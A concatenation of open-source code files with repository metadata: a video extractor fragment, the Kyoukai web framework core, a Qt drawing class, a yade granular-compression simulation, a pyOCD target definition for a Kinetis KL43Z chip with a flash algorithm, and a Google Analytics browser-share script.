error_message = ', '.join([error['message'] for error in errors])
raise ExtractorError('%s said: %s' % (self.IE_NAME, error_message), expected=True)
asset_url += '?' + entitlement['uplynkData']['sessionKey']
formats.extend(self._extract_m3u8_formats(
asset_url, video_id, 'mp4', m3u8_id=format_id or 'hls', fatal=False))
else:
f = {
'format_id': format_id,
'url': asset_url,
'ext': ext,
}
if re.search(r'(?:/mp4/source/|_source\.mp4)', asset_url):
f.update({
'format_id': ('%s-' % format_id if format_id else '') + 'SOURCE',
'preference': 1,
})
else:
mobj = re.search(r'/(\d+)x(\d+)/', asset_url)
if mobj:
height = int(mobj.group(2))
f.update({
'format_id': ('%s-' % format_id if format_id else '') + '%dP' % height,
'width': int(mobj.group(1)),
'height': height,
})
formats.append(f)
self._sort_formats(formats)
subtitles = {}
for cc in video_data.get('closedcaption', {}).get('src', []):
cc_url = cc.get('value')
if not cc_url:
continue
ext = determine_ext(cc_url)
if ext == 'xml':
ext = 'ttml'
subtitles.setdefault(cc.get('lang'), []).append({
'url': cc_url,
'ext': ext,
})
thumbnails = []
for thumbnail in video_data.get('thumbnails', {}).get('thumbnail', []):
thumbnail_url = thumbnail.get('value')
if not thumbnail_url:
continue
thumbnails.append({
'url': thumbnail_url,
'width': int_or_none(thumbnail.get('width')),
'height': int_or_none(thumbnail.get('height')),
})
return {
'id': video_id,
'title': title,
'description': video_data.get('longdescription') or video_data.get('description'),
'duration': int_or_none(video_data.get('duration', {}).get('value'), 1000),
'age_limit': parse_age_limit(video_data.get('tvrating', {}).get('rating')),
'episode_number': int_or_none(video_data.get('episodenumber')),
'series': video_data.get('show', {}).get('title'),
'season_number': int_or_none(video_data.get('season', {}).get('num')),
'thumbnails': thumbnails,
'formats': formats,
'subtitles': subtitles,
}
|
gpl-3.0
| 2,572,050,881,610,135,600
| 41.133028
| 155
| 0.470876
| false
| 3.776727
| false
| false
| false
|
SunDwarf/Kyoukai
|
kyoukai/app.py
|
1
|
15848
|
"""
The core application.
"""
import asyncio
import logging
import traceback
from asphalt.core import Context, run_application
from werkzeug.exceptions import NotFound, MethodNotAllowed, HTTPException, InternalServerError, \
BadRequestKeyError
from werkzeug.routing import RequestRedirect, Map
from werkzeug.wrappers import Request, Response
from kyoukai.asphalt import HTTPRequestContext
from kyoukai.blueprint import Blueprint
__version__ = "2.2.1.post1"
version_format = "Kyoukai/{}".format(__version__)
logger = logging.getLogger("Kyoukai")
class Kyoukai(object):
"""
The Kyoukai type is the core of the Kyoukai framework, and the core of your web application
based upon the Kyoukai framework. It acts as a central router and request processor that
takes in requests from the protocols and returns responses.
The application name is currently unused, but it is good practice to set it correctly anyway in
case it is used in future editions of Kyoukai.
You normally create an application instance inside your component file, like so:
.. code-block:: python
from kyoukai.app import Kyoukai
... # setup code
kyk = Kyoukai("my_app")
kyk.register_blueprint(whatever)
... # other setup
class MyContainer(ContainerComponent):
async def start(self, ctx):
self.add_component('kyoukai', KyoukaiComponent, ip="127.0.0.1", port=4444,
app="app:app")
Of course, you can also embed Kyoukai inside another app, by awaiting :meth:`Kyoukai.start`.
"""
#: The class of request to spawn every request.
#: This should be a subclass of :class:`werkzeug.wrappers.Request`.
#: You can override this by passing ``request_class`` as a keyword argument to the app.
request_class = Request
#: The class of response to wrap automatically.
#: This should be a subclass of :class:`werkzeug.wrappers.Response`.
#: You can override this by passing ``response_class`` as a keyword argument to the app.
response_class = Response
def __init__(self,
application_name: str,
*,
server_name: str = None,
**kwargs):
"""
:param application_name: The name of the application that is being created. This is \
passed to the :class:`.Blueprint` being created as the root blueprint.
This is used in ``url_for``, for example, to get the endpoint of routes registered to \
the root Blueprint.
:param server_name: Keyword-only. The SERVER_NAME to use inside the fake WSGI environment \
created for ``url_for``, if applicable.
:param host_matching: Should host matching be enabled? This will be implicitly True if \
``host`` is not None.
:param host: The host used for host matching, to be passed to the root Blueprint.
By default, no host is used, so all hosts are matched on the root Blueprint.
:param application_root: Keyword-only. The APPLICATION_ROOT to use inside the fake WSGI \
environment created for ``url_for``, if applicable.
:param loop: Keyword-only. The asyncio event loop to use for this app. If no loop is \
specified it, will be automatically fetched using :meth:`asyncio.get_event_loop`.
:param request_class: Keyword-only. The custom request class to instantiate requests with.
:param response_class: Keyword-only. The custom response class to instantiate responses \
with.
:param context_class: Keyword-only. The :class:`.Context` subclass to use when creating a \
context. Defaults to :class:`.HTTPRequestContext`.
"""
self.name = application_name
self.server_name = server_name
        # Try to get the loop from the keyword arguments; fall back to
        # `get_event_loop` below only if none was supplied.
self.loop = kwargs.pop("loop", None)
if not self.loop:
self.loop = asyncio.get_event_loop()
# Create the root blueprint.
self._root_bp = Blueprint(application_name, host=kwargs.get("host"),
host_matching=kwargs.get("host_matching", False))
# The current Component that is running this app.
self.component = None
# The Request/Response classes.
self.request_class = kwargs.pop("request_class", self.request_class)
self.response_class = kwargs.pop("response_class", self.response_class)
#: The context class.
self.context_class = kwargs.pop("context_class", HTTPRequestContext)
# Is this app set to debug mode?
self.debug = False
# Any extra config.
self.config = kwargs
@property
def root(self) -> Blueprint:
"""
:return: The root Blueprint for the routing tree.
"""
return self._root_bp
def register_blueprint(self, child: Blueprint):
"""
Registers a child blueprint to this app's root Blueprint.
        This will set up the Blueprint tree, as well as the routing table once the app is finalized.
:param child: The child Blueprint to add. This must be an instance of :class:`~.Blueprint`.
"""
return self.root.add_child(child)
def finalize(self, **map_options) -> Map:
"""
Finalizes the app and blueprints.
This will calculate the current :class:`werkzeug.routing.Map` which is required for
routing to work.
:param map_options: The options to pass to the Map for routing.
"""
self.debug = self.config.get("debug", False)
return self.root.finalize(**map_options)
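    # NB: process_request() refuses to serve until finalize() has been
    # called, so finalize the app once after all blueprints are registered.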
# Magic methods
def __getattr__(self, item: str) -> object:
"""
Override for __getattr__ to allow transparent mirroring onto the root Blueprint.
For example, this allows doing ``@app.route`` instead of ``@app.root.route``.
"""
if item in ("route", "errorhandler", "add_errorhandler", "add_route", "wrap_route",
"url_for", "before_request", "add_hook", "after_request",
"add_route_group"):
return getattr(self.root, item)
raise AttributeError("'{.__class__.__name__}' object has no attribute {}"
.format(self, item))
def log_route(self, request: Request, code: int):
"""
Logs a route invocation.
:param request: The request produced.
:param code: The response code of the route.
"""
fmtted = "{} {} - {}".format(request.method, request.path, code)
logger.info(fmtted)
async def handle_httpexception(self, ctx: HTTPRequestContext, exception: HTTPException,
environ: dict = None) -> Response:
"""
Handle a HTTP Exception.
:param ctx: The context of the request.
:param exception: The HTTPException to handle.
:param environ: The fake WSGI environment.
:return: A :class:`werkzeug.wrappers.Response` that handles this response.
"""
# Try and load the error handler recursively from the ctx.route.blueprint.
bp = ctx.bp or self.root
if environ is None:
environ = ctx.environ
cbl = lambda environ: Response("Internal server error during processing. Report this.",
status=500)
error_handler = bp.get_errorhandler(exception)
if not error_handler:
            # Fall back to the root Blueprint; this can happen if the matched
            # blueprint isn't properly registered under the root.
error_handler = self.root.get_errorhandler(exception)
if not error_handler:
# Just return the Exception's get_response.
cbl = exception.get_response
else:
# Try and invoke the error handler to get the Response.
            # Wrap it in try/except so we can fall back to a default response on failure.
try:
res = await error_handler.invoke(ctx, args=(exception,))
                # wrap the response in a callable so all branches below share one path
cbl = lambda environ: res
except HTTPException as e:
                # the handler itself raised an HTTPException; use its response
logger.warning("Error handler function raised another error, using the "
"response from that...")
cbl = e.get_response
except Exception as e:
logger.exception("Error in error handler!")
cbl = InternalServerError(e).get_response
# else:
# result = wrap_response(result, self.response_class)
try:
result = cbl(environ=environ)
except Exception:
            # even the fallback callable failed; return a generic 500
logger.critical("Whilst handling a {}, response.get_response ({}) raised exception"
.format(exception.code, cbl), exc_info=True)
result = Response("Critical server error. Your application is broken.",
status=500)
if result.status_code != exception.code:
logger.warning("Error handler {} returned code {} when exception was code {}..."
.format(error_handler.callable_repr, result.status_code,
exception.code))
return result
async def process_request(self, request: Request, parent_context: Context) -> Response:
"""
Processes a Request and returns a Response object.
This is the main processing method of Kyoukai, and is meant to be used by one of the HTTP
        server backends, not by client code.
:param request: \
The :class:`werkzeug.wrappers.Request` object to process.
A new :class:`~.HTTPRequestContext` will be provided to wrap this request inside of \
to client code.
:param parent_context: \
The :class:`asphalt.core.Context` that is the parent context for this particular app.
It will be used as the parent for the HTTPRequestContext.
:return: A :class:`werkzeug.wrappers.Response` object that can be written to the client \
as a response.
"""
if not self.root.finalized:
raise RuntimeError("App was not finalized")
# Create a new HTTPRequestContext.
ctx = self.context_class(parent_context, request)
ctx.app = self
async with ctx:
# Call match on our Blueprint to find the request.
try:
matched, params, rule = self.root.match(request.environ)
ctx.params = params
ctx.rule = rule
except NotFound as e:
# No route matched.
self.log_route(ctx.request, 404)
logger.debug("Could not resolve route for {request.path}."
.format(request=request))
return await self.handle_httpexception(ctx, e, request.environ)
except MethodNotAllowed as e:
# 405 method not allowed
self.log_route(ctx.request, 405)
logger.debug("Could not resolve valid method for "
"{request.path} ({request.method})".format(request=request))
return await self.handle_httpexception(ctx, e, request.environ)
except RequestRedirect as e:
# slashes etc
# user code is not allowed to handle this
self.log_route(ctx.request, 307)
e.code = 307
return e.get_response(request.environ)
else:
ctx.route_matched.dispatch(ctx=ctx)
ctx.route = matched
ctx.bp = ctx.route.bp
result = None
# Invoke the route.
try:
ctx.route_invoked.dispatch(ctx=ctx)
                # Intercept OPTIONS before invoking the route:
if ctx.request.method.upper() == "OPTIONS":
                    # no user code runs for OPTIONS; Kyoukai auto-calculates
                    # and returns the Allow: header itself
result = Response(status=204)
result.headers["Allow"] = ",".join(x for x in ctx.rule.methods if x !=
"OPTIONS")
else:
result = await matched.invoke(ctx, params=params)
except BadRequestKeyError as e:
logger.info("BadRequestKeyError: {}".format(' '.join(e.args)), exc_info=True)
result = await self.handle_httpexception(ctx, e, request.environ)
except HTTPException as e:
fmtted = traceback.format_exception(type(e), e, e.__traceback__)
logger.debug(''.join(fmtted))
logger.info(
"Hit HTTPException ({}) inside function, delegating.".format(str(e))
)
result = await self.handle_httpexception(ctx, e, request.environ)
except Exception as e:
logger.exception("Unhandled exception in route function")
new_e = InternalServerError()
new_e.__cause__ = e
result = await self.handle_httpexception(ctx, new_e, request.environ)
else:
ctx.route_completed.dispatch(ctx=ctx, result=result)
finally:
# result = wrap_response(result, self.response_class)
if result:
# edge cases
self.log_route(ctx.request, result.status_code)
# Update the Server header.
result.headers["Server"] = version_format
                # a list body is usually a WSGI-style iterable; leave it as-is
if not isinstance(result.response, (bytes, str, list)):
result.set_data(str(result.response))
result.headers["X-Powered-By"] = version_format
# Return the new Response.
return result
async def start(self, ip: str = "127.0.0.1", port: int = 4444, *,
component=None, base_context: Context = None):
"""
Runs the Kyoukai component asynchronously.
This will bypass Asphalt's default runner, and allow you to run your app easily inside
        something else, such as another running application.
:param ip: The IP of the built-in server.
:param port: The port of the built-in server.
:param component: The component to start the app with. This should be an instance of \
:class:`~.KyoukaiComponent`.
:param base_context: The base context that the HTTPRequestContext should be started with.
"""
if not base_context:
base_context = Context()
if not component:
from kyoukai.asphalt import KyoukaiComponent
self.component = KyoukaiComponent(self, ip, port)
else:
self.component = component
# Start the app.
await self.component.start(base_context)
def run(self, ip: str = "127.0.0.1", port: int = 4444, *,
component=None):
"""
Runs the Kyoukai server from within your code.
This is not normally invoked - instead Asphalt should invoke the Kyoukai component.
However, this is here for convenience.
"""
if not component:
from kyoukai.asphalt import KyoukaiComponent
component = KyoukaiComponent(self, ip, port)
run_application(component)
|
mit
| 6,110,582,815,789,452,000
| 39.74036
| 100
| 0.585247
| false
| 4.613683
| false
| false
| false
|
RoboCupULaval/UI-Debug
|
Controller/DrawingObject/TextDrawing.py
|
1
|
1227
|
# Under MIT License, see LICENSE.txt
from Controller.DrawingObject.BaseDrawingObject import BaseDrawingObject
from Controller.QtToolBox import QtToolBox
from Model.DataObject.DrawingData.DrawTextDataIn import DrawTextDataIn
__author__ = 'RoboCupULaval'
class TextDrawing(BaseDrawingObject):
def __init__(self, data_in):
BaseDrawingObject.__init__(self, data_in)
def draw(self, painter):
# TODO Add alignment
if self.isVisible():
data = self.data
painter.setPen(QtToolBox.create_pen(color=data['color'],
width=data['size']))
painter.setBrush(QtToolBox.create_brush(data['color']))
painter.setFont(QtToolBox.create_font(style=data['font'],
width=data['size'],
is_bold=data['has_bold'],
is_italic=data['has_italic']))
x, y, _ = QtToolBox.field_ctrl.convert_real_to_scene_pst(*data['position'])
painter.drawText(x, y, data['text'])
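    # The class-name string returned below presumably lets the controller's
    # drawing factory map incoming DrawTextDataIn packets to this class.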
@staticmethod
def get_datain_associated():
return DrawTextDataIn.__name__
|
mit
| 5,168,425,059,868,672,000
| 38.580645
| 87
| 0.564792
| false
| 4.159322
| false
| false
| false
|
anna-effeindzourou/trunk
|
examples/anna_scripts/triax/debug/triaxial.py
|
1
|
3282
|
# -*- coding: utf-8 -*-
from yade import ymport, utils,pack,export,qt
import gts,os
from yade import geom
#import matplotlib
from yade import plot
#from pylab import *
#import os.path, locale
#################################
##### FUNCTIONS ####
#################################
def writeFile():
    export.text('spheres_1e-02.txt')
####################
### MATERIAL ###
####################
poisson=0.28
E=2*7.9e10*(1+poisson) ##1e11
density=7.8e8
frictionAngle=0.096
frictionAngleW=0.228
O.materials.append(FrictMat(young=E,poisson=poisson,density=density,frictionAngle=frictionAngleW,label='Wallmat'))
O.materials.append(FrictMat(young=E,poisson=poisson,density=density,frictionAngle=frictionAngle,label='Smat'))
##########################
### SPHERE PACKING ###
##########################
#### Parameters the cylinder ###
L=0.203 # height [m]
l=0.0505 # radius [m]
color=[155./255.,155./255.,100./255.]
radius=1e-02
kwBoxes={'color':[1,0,0],'wire':True,'dynamic':False,'material':1}
O.bodies.append(utils.geom.facetCylinder(center=Vector3(0,0,L/2.), radius=l, height=L, orientation=Quaternion((1, 0, 0), 0),**kwBoxes))
### erase the top and bottom facets of the cylinder
for i in range(0,40,4):
O.bodies.erase(i)
for i in range(1,38,4):
O.bodies.erase(i)
predicate=inCylinder(centerBottom=Vector3(0,0,0), centerTop=Vector3(0,0,L+L/2.), radius=l-0.005)
sp=SpherePack()
sp=pack.randomDensePack(predicate, radius=radius, material='Smat', cropLayers=10, rRelFuzz=0.0, spheresInCell=100,returnSpherePack=True)
sp.toSimulation()
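# randomDensePack compacts ~100 spheres in an internal periodic cell and
# replicates that cell to fill the cylindrical predicate, which is much
# faster than compacting the full specimen directly.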
########################
#### WALL GENERATION ##
########################
O.materials.append(FrictMat(young=E,poisson=poisson,density=density,frictionAngle=frictionAngleW,label='Wmat'))
topPlate=utils.wall(position=hMax(2)+radius*10,sense=0, axis=2,color=Vector3(1,0,0),material='Wmat')
O.bodies.append(topPlate)
bottomPlate=utils.wall(position=0,sense=0, axis=2,color=Vector3(1,0,0),material='Wmat')
O.bodies.append(bottomPlate)
######################
#### MOVE TOP WALL ##
######################
v=1.7e-03
def movewall(v):
topPlate.state.pos=Vector3(0,0,hMax(2)+radius)
topPlate.state.vel=Vector3(0,0,-v)
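# NB: movewall() is never called in this script; presumably it is meant to be
# invoked interactively (movewall(v)) once the packing has settled, to start
# compressing the specimen with the top wall.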
def dataCollector():
S=pi*l**2
Fnt=O.forces.f(topPlate.id)[2]
Fnb=O.forces.f(bottomPlate.id)[2]
#sigma=Fnb/S
plot.addData(t1=O.time,t2=O.time,Fnb=Fnb,Fnt=Fnt)
plot.plots={'t1':('Fnb'),'t2':('Fnt')}
plot.plot(noShow=False, subPlots=True)
#########################
### ENGINE DEFINITION ##
#########################
O.dt=0.5*PWaveTimeStep()
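# (0.5 is a safety factor on the critical explicit-integration time step
# estimated from the P-wave speed of the sphere material)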
O.engines=[
ForceResetter(),
InsertionSortCollider([
Bo1_Sphere_Aabb(),
Bo1_Wall_Aabb(),
Bo1_Facet_Aabb(),
]),
InteractionLoop([
Ig2_Sphere_Sphere_ScGeom(),
Ig2_Facet_Sphere_ScGeom(),
Ig2_Wall_Sphere_ScGeom()
],
[Ip2_CohFrictMat_CohFrictMat_CohFrictPhys(setCohesionNow=True,setCohesionOnNewContacts=True),
Ip2_FrictMat_FrictMat_FrictPhys()],
[Law2_ScGeom6D_CohFrictPhys_CohesionMoment(),
Law2_ScGeom_FrictPhys_CundallStrack(),
Law2_ScGridCoGeom_FrictPhys_CundallStrack(),
Law2_GridCoGridCoGeom_FrictPhys_CundallStrack()
]
),
DomainLimiter(lo=(-l,-l,0),hi=(l,l,1),iterPeriod=200),
NewtonIntegrator(damping=0.7,gravity=(0,0,-9.81),label='Newton'),
PyRunner(initRun=True,iterPeriod=1,command='dataCollector()'),
]
|
gpl-2.0
| 1,837,860,220,478,985,200
| 28.3125
| 137
| 0.650518
| false
| 2.568075
| false
| false
| false
|
mesheven/pyOCD
|
pyocd/target/target_MKL43Z256xxx4.py
|
1
|
6800
|
"""
mbed CMSIS-DAP debugger
Copyright (c) 2006-2013,2018 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
from .family.target_kinetis import Kinetis
from .family.flash_kinetis import Flash_Kinetis
from ..core.memory_map import (FlashRegion, RamRegion, MemoryMap)
from ..debug.svd import SVDFile
import logging
FLASH_ALGO = { 'load_address' : 0x20000000,
'instructions' : [
0xE00ABE00, 0x062D780D, 0x24084068, 0xD3000040, 0x1E644058, 0x1C49D1FA, 0x2A001E52, 0x4770D1F2,
0x09032200, 0xd373428b, 0x428b0a03, 0x0b03d358, 0xd33c428b, 0x428b0c03, 0xe012d321, 0x430b4603,
0x2200d47f, 0x428b0843, 0x0903d374, 0xd35f428b, 0x428b0a03, 0x0b03d344, 0xd328428b, 0x428b0c03,
0x22ffd30d, 0xba120209, 0x428b0c03, 0x1212d302, 0xd0650209, 0x428b0b03, 0xe000d319, 0x0bc30a09,
0xd301428b, 0x1ac003cb, 0x0b834152, 0xd301428b, 0x1ac0038b, 0x0b434152, 0xd301428b, 0x1ac0034b,
0x0b034152, 0xd301428b, 0x1ac0030b, 0x0ac34152, 0xd301428b, 0x1ac002cb, 0x0a834152, 0xd301428b,
0x1ac0028b, 0x0a434152, 0xd301428b, 0x1ac0024b, 0x0a034152, 0xd301428b, 0x1ac0020b, 0xd2cd4152,
0x428b09c3, 0x01cbd301, 0x41521ac0, 0x428b0983, 0x018bd301, 0x41521ac0, 0x428b0943, 0x014bd301,
0x41521ac0, 0x428b0903, 0x010bd301, 0x41521ac0, 0x428b08c3, 0x00cbd301, 0x41521ac0, 0x428b0883,
0x008bd301, 0x41521ac0, 0x428b0843, 0x004bd301, 0x41521ac0, 0xd2001a41, 0x41524601, 0x47704610,
0x0fcae05d, 0x4249d000, 0xd3001003, 0x40534240, 0x469c2200, 0x428b0903, 0x0a03d32d, 0xd312428b,
0x018922fc, 0x0a03ba12, 0xd30c428b, 0x11920189, 0xd308428b, 0x11920189, 0xd304428b, 0xd03a0189,
0xe0001192, 0x09c30989, 0xd301428b, 0x1ac001cb, 0x09834152, 0xd301428b, 0x1ac0018b, 0x09434152,
0xd301428b, 0x1ac0014b, 0x09034152, 0xd301428b, 0x1ac0010b, 0x08c34152, 0xd301428b, 0x1ac000cb,
0x08834152, 0xd301428b, 0x1ac0008b, 0xd2d94152, 0x428b0843, 0x004bd301, 0x41521ac0, 0xd2001a41,
0x46634601, 0x105b4152, 0xd3014610, 0x2b004240, 0x4249d500, 0x46634770, 0xd300105b, 0xb5014240,
0x46c02000, 0xbd0246c0, 0xb510480a, 0x44484908, 0xf8ecf000, 0xd1042800, 0x21004806, 0xf0004448,
0x4a05f9b1, 0x230168d1, 0x4319029b, 0xbd1060d1, 0x6b65666b, 0x00000004, 0xf0003000, 0x4c0cb570,
0x444c4605, 0x4b0b4601, 0x68e24620, 0xf894f000, 0xd1052800, 0x46292300, 0x68e24620, 0xf956f000,
0x68ca4905, 0x029b2301, 0x60ca431a, 0x0000bd70, 0x00000004, 0x6b65666b, 0xf0003000, 0x4905b510,
0x60082000, 0x44484804, 0xf8e8f000, 0xd0002800, 0xbd102001, 0x40048100, 0x00000004, 0x460cb570,
0x4606460b, 0x480d4601, 0x4615b084, 0xf0004448, 0x2800f8f5, 0x9001d10a, 0x21019002, 0x91004807,
0x4622462b, 0x44484631, 0xf96af000, 0x68ca4904, 0x029b2301, 0x60ca431a, 0xbd70b004, 0x00000004,
0xf0003000, 0x47702000, 0xd0032800, 0xd801290f, 0xd0012a04, 0x47702004, 0x47702000, 0xd1012800,
0x47702004, 0x1e5bb410, 0x421c460c, 0x421ad101, 0xbc10d002, 0x47702065, 0x428b6803, 0x6840d804,
0x18181889, 0xd2024288, 0x2066bc10, 0xbc104770, 0x47702000, 0x42884903, 0x206bd001, 0x20004770,
0x00004770, 0x6b65666b, 0x2170480a, 0x21807001, 0x78017001, 0xd5fc0609, 0x06817800, 0x2067d501,
0x06c14770, 0x2068d501, 0x07c04770, 0x2069d0fc, 0x00004770, 0x40020000, 0x4605b5f8, 0x460c4616,
0xf7ff4618, 0x2800ffd7, 0x2304d12b, 0x46214632, 0xf7ff4628, 0x0007ffb3, 0x19a6d123, 0x68e91e76,
0x91004630, 0xfe3cf7ff, 0xd0032900, 0x1c409e00, 0x1e764346, 0xd81342b4, 0x4478480a, 0x60046800,
0x20094909, 0xf7ff71c8, 0x4607ffbf, 0x280069a8, 0x4780d000, 0xd1032f00, 0x190468e8, 0xd9eb42b4,
0xbdf84638, 0x0000026a, 0x40020000, 0x4604b510, 0xf7ff4608, 0x2800ff9f, 0x2c00d106, 0x4904d005,
0x71c82044, 0xffa0f7ff, 0x2004bd10, 0x0000bd10, 0x40020000, 0xd00c2800, 0xd00a2a00, 0xd21a2908,
0x447b000b, 0x18db791b, 0x0705449f, 0x0d0b0907, 0x2004110f, 0x68c04770, 0x6840e00a, 0x6880e008,
0x6800e006, 0x2000e004, 0x6900e002, 0x6940e000, 0x20006010, 0x206a4770, 0x00004770, 0xd0142800,
0x68c9490c, 0x0e094a0c, 0x447a0049, 0x03095a51, 0x2200d00d, 0x60416002, 0x60812102, 0x61426102,
0x61820249, 0x461060c1, 0x20044770, 0x20644770, 0x00004770, 0x40048040, 0x0000019a, 0xd1012a00,
0x47702004, 0x461cb5ff, 0x4615b081, 0x2304460e, 0x98014622, 0xff22f7ff, 0xd1190007, 0xd0162c00,
0x4478480c, 0x600e6801, 0x6800cd02, 0x490a6041, 0x71c82006, 0xff38f7ff, 0x98014607, 0x28006980,
0x4780d000, 0xd1022f00, 0x1f241d36, 0x4638d1e8, 0xbdf0b005, 0x00000162, 0x40020000, 0xd0022800,
0x20006181, 0x20044770, 0x00004770, 0xb081b5ff, 0x460e4614, 0x23044605, 0xfef0f7ff, 0xd12a2800,
0x686868a9, 0xfd7cf7ff, 0x42719000, 0x40014240, 0x42b7424f, 0x9800d101, 0x2c00183f, 0x1bbdd01a,
0xd90042a5, 0x490d4625, 0x447908a8, 0x600e6809, 0x2201490b, 0x0a0271ca, 0x728872ca, 0x72489804,
0xfef2f7ff, 0xd1062800, 0x1b649800, 0x183f1976, 0xd1e42c00, 0xb0052000, 0x0000bdf0, 0x000000da,
0x40020000, 0xd1012800, 0x47702004, 0x4803b510, 0x71c22240, 0xf7ff7181, 0xbd10fed7, 0x40020000,
0xd1012b00, 0x47702004, 0x461cb5f8, 0x460e4615, 0x9f082304, 0xfea2f7ff, 0xd1192800, 0xd0172d00,
0x447a4a0f, 0x60066810, 0x2102480e, 0x990671c1, 0x681172c1, 0x60886820, 0xfeb6f7ff, 0xd0082800,
0x29009907, 0x600ed000, 0xd0012f00, 0x60392100, 0x1f2dbdf8, 0x1d361d24, 0xd1e12d00, 0x0000bdf8,
0x00000062, 0x40020000, 0x00040002, 0x00080000, 0x00100000, 0x00200000, 0x00400000, 0x00000000,
0x00000000, 0x00400000, 0x40020004, 0x00000000,
],
'pc_init' : 0x2000027D,
'pc_unInit': 0x200002E5,
'pc_program_page': 0x2000029D,
'pc_erase_sector': 0x2000023D,
'pc_eraseAll' : 0x20000209,
'static_base' : 0x20000000 + 0x00000020 + 0x0000060c,
'begin_stack' : 0x20000000 + 0x00000800,
'begin_data' : 0x20000000 + 0x00000A00,
'page_buffers' : [0x20000a00, 0x20001200], # Enable double buffering
'min_program_length' : 4,
'analyzer_supported' : True,
'analyzer_address' : 0x20002000
};
class KL43Z4(Kinetis):
memoryMap = MemoryMap(
FlashRegion( start=0, length=0x40000, blocksize=0x400, is_boot_memory=True,
algo=FLASH_ALGO, flash_class=Flash_Kinetis),
RamRegion( start=0x1fffe000, length=0x8000)
)
def __init__(self, transport):
super(KL43Z4, self).__init__(transport, self.memoryMap)
self._svd_location = SVDFile(vendor="Freescale", filename="MKL43Z4.svd")
|
apache-2.0
| 9,023,858,836,470,273,000
| 64.384615
| 101
| 0.769559
| false
| 2.073803
| false
| false
| false
|
samdsmx/omegaup
|
stuff/browser_analytics.py
|
2
|
7171
|
#!/usr/bin/python3
"""Analyze browser usage from Google Analytics.
In order to use this tool, export a .csv report of browsers (Audience >
Technology > Browser & OS), with Secondary dimension of Browser Version.
The mappings of some browser versions to their equivalent Chromium version may
need to be maintained every now and then.
"""
import argparse
import collections
import csv
import dataclasses
from typing import Callable, DefaultDict, List, Sequence, TextIO, Tuple
@dataclasses.dataclass
class Browser:
"""A Browser version"""
name: str = ''
version: str = ''
users: int = 0
users_share: float = 0
def _parse_report(report: TextIO,
column: str) -> Tuple[Browser, List[Browser]]:
# pylint: disable=too-many-branches,too-many-statements
csv_lines: List[str] = []
# Strip the header. It consists of a series of lines that start with #
# followed by an empty line.
for line in report:
if line.strip():
continue
break
# Parse the contents.
for line in report:
line = line.strip()
if not line:
break
csv_lines.append(line)
browser_mapping: DefaultDict[Tuple[str, str],
Browser] = collections.defaultdict(Browser)
reader = csv.DictReader(csv_lines)
totals = Browser(name='Total', users_share=1.)
for row in reader:
version = row['Browser Version'].split('.')[0]
if not version.isnumeric():
version = ''
name = row['Browser']
        if name == 'Edge' and version and int(version) >= 79:
# Edge started using Chromium since version 79.
name = 'Chrome'
        elif name == 'Android Webview' and version and int(version) >= 36:
# Android started using Chromium since Lollipop / version 36.
name = 'Chrome'
elif name == 'UC Browser':
chromium_version_mapping = {
'12': '57',
}
if version in chromium_version_mapping:
name = 'Chrome'
version = chromium_version_mapping[version]
elif name == 'Samsung Internet':
chromium_version_mapping = {
'4': '44',
'5': '51',
'6': '56',
'7': '59',
'8': '63',
'9': '67',
'10': '71',
'11': '75',
'12': '79',
}
if version in chromium_version_mapping:
name = 'Chrome'
version = chromium_version_mapping[version]
elif name == 'Opera':
chromium_version_mapping = {
'47': '48',
'50': '63',
'51': '64',
'52': '65',
'53': '66',
'54': '67',
'55': '68',
'56': '69',
'57': '70',
'58': '71',
'59': '72',
'60': '73',
'61': '74',
'62': '75',
'63': '76',
'64': '77',
'65': '78',
'66': '79',
'67': '80',
'68': '80',
'69': '83',
}
if version in chromium_version_mapping:
name = 'Chrome'
version = chromium_version_mapping[version]
elif name == 'YaBrowser':
chromium_version_mapping = {
'20': '83',
}
if version in chromium_version_mapping:
name = 'Chrome'
version = chromium_version_mapping[version]
elif name == 'Safari':
# Some versions of Safari report the WebKit version, not the Safari
# one.
if version == '602':
version = '10'
if version == '604':
version = '11'
if version == '605':
version = '11'
key = (name, version)
if key == ('', ''):
# This is the totals row
continue
value = int(row[column].replace(',', ''))
browser_mapping[key].users += value
totals.users += value
for (name, version), browser in browser_mapping.items():
browser.name = name
browser.version = version
browser.users_share = browser.users / totals.users
return totals, list(browser_mapping.values())
def _is_filtered(browser: Browser, ignore: Sequence[str]) -> bool:
for descriptor in ignore:
op_mapping: Sequence[Tuple[str, Callable[[int, int], bool]]] = (
('<=', lambda a, b: a <= b),
('=', lambda a, b: a == b),
('<', lambda a, b: a < b),
)
for op, fn in op_mapping:
if op not in descriptor:
continue
name, version = descriptor.split(op)
            if (browser.name == name and browser.version.isnumeric()
                    and fn(int(browser.version), int(version))):
                return True
if browser.name == descriptor:
return True
return False
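# Example with made-up values: the descriptor 'Chrome<51' splits into
# name='Chrome', op='<', version='51', so Browser(name='Chrome',
# version='49') is filtered out while Browser(name='Chrome',
# version='51') is kept.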
def _main() -> None:
parser = argparse.ArgumentParser(description=__doc__)
parser.add_argument('--ignore',
default=[
'Android Browser',
'Android Runtime',
'Android Webview<36',
'Chrome<51',
'Firefox<68',
'Hexometer',
'Internet Explorer',
'Opera Mini',
'Safari<12',
'Samsung Internet<4',
'[FBAN',
],
type=str,
nargs='*',
help='Ignore browser')
parser.add_argument('--column', default='Users')
parser.add_argument('--sort-by-share', action='store_true')
parser.add_argument('report',
type=argparse.FileType('r'),
metavar='REPORT.CSV',
help='An exported .csv from Google Analytics')
args = parser.parse_args()
totals, browsers = _parse_report(args.report, args.column)
if args.sort_by_share:
browsers.sort(key=lambda b: b.users, reverse=True)
else:
browsers.sort(key=lambda b: (b.name, b.version))
cumulative = 0.
print(f'{"Browser name":20} {"Version":7} '
f'{"Users":>6} {"Share%":>7} {"Cmltiv%":>7} ')
print('=' * 51)
for browser in browsers:
if _is_filtered(browser, args.ignore):
continue
cumulative += browser.users
print(f'{browser.name:20} {browser.version:>7} '
f'{browser.users:6} '
f'{browser.users_share*100:6.2f}% '
f'{cumulative/totals.users*100:6.2f}%')
print('=' * 51)
print(f'{totals.name:20} {totals.version:>7} '
f'{totals.users:6} '
f'{totals.users_share*100:6.2f}% '
f'{cumulative/totals.users*100:6.2f}%')
if __name__ == '__main__':
_main()
|
bsd-3-clause
| -5,068,709,898,575,506,000
| 32.509346
| 79
| 0.473714
